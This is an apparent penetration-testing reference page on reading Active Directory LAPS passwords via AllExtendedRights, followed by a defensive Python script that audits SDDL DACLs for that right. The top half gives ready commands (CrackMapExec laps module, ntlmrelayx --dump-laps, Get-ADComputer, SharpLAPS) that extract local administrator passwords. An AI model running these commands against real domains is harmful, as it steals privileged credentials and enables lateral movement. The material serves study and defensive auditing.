ReadLAPSPassword
This abuse can be carried out when controlling an object that has AllExtendedRights over a target computer. The attacker can then read the LAPS password of the computer account.
UNIX-like
Windows
From UNIX-like systems, CrackMapExec (Python) can be used to retrieve LAPS passwords (this only works with v5.1.6 and later).
# Default command
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps

# The COMPUTER filter can be a name or a wildcard (e.g. WIN-S10, WIN-*). Default: *
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
Alternatives include LAPSDumper (Python) or this public module for CrackMapExec.
Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps option.
From Windows systems, this can be achieved with the Active Directory PowerShell module.
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
SharpLAPS (C#) automates that process.
SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"
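To audit for the precondition described at the top of this page (a principal holding AllExtendedRights over a computer), the following added example, which is not part of the original page or of any tool it mentions, parses a computer object's security descriptor in SDDL form and lists the trustees whose allow ACEs grant all extended rights on the object itself. The SDDL string, SIDs and GUID are constructed sample values, and the function names are hypothetical.

```python
import re

# SDDL ACE layout: (type;flags;rights;object_guid;inherit_object_guid;trustee)
DACL_RE = re.compile(r"D:[A-Z]*((?:\([^()]*\))+)")
CONTROL_ACCESS = 0x00000100  # ADS_RIGHT_DS_CONTROL_ACCESS, "CR" in SDDL
GENERIC_ALL = 0x10000000     # "GA" in SDDL

def tokens(field):
    """Split an SDDL flags/rights field into its two-letter codes."""
    return {field[i:i + 2] for i in range(0, len(field), 2)}

def has_control_access(rights):
    """True if the rights field (hex mask or letter codes) includes CR or GA."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & (CONTROL_ACCESS | GENERIC_ALL))
    # Tokenise: a substring test would wrongly match "CR" inside "LCRP" (LC + RP).
    return bool(tokens(rights) & {"CR", "GA"})

def all_extended_rights_trustees(sddl):
    """Trustees whose allow ACE grants every extended right on the object itself."""
    dacl = DACL_RE.search(sddl)  # DACL only; SACL (audit) ACEs are skipped
    hits = []
    for ace in re.findall(r"\(([^()]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")
        if len(fields) != 6:
            continue  # conditional/resource ACEs are out of scope here
        ace_type, flags, rights, object_guid, _inherit_guid, trustee = fields
        if ace_type not in ("A", "OA"):
            continue  # deny ACEs grant nothing
        if "IO" in tokens(flags):
            continue  # inherit-only: applies to children, not this object
        if object_guid:
            continue  # scoped to one extended right, property set or attribute
        if has_control_access(rights):
            hits.append(trustee)
    return hits

# Constructed DACL for a hypothetical computer object (SIDs and GUID are made up).
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_SDDL = (
    "O:DAG:DUD:AI(OD;;CR;;;" + DOMAIN + "-1607)(A;;GA;;;SY)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)(OA;;CR;;;" + DOMAIN + "-1604)"
    "(OA;;CR;11111111-2222-3333-4444-555555555555;;" + DOMAIN + "-1605)"
    "(OA;CIIO;CR;;;" + DOMAIN + "-1606)(A;;LCRPLORC;;;AU)S:(AU;SA;CR;;;WD)"
)

if __name__ == "__main__":
    for trustee in all_extended_rights_trustees(SAMPLE_SDDL):
        print("holds all extended rights on this computer:", trustee)
```

Any trustee reported here that is not an expected administrative group is worth reviewing, since the check ignores deny ACEs and group nesting and therefore only lists direct grants.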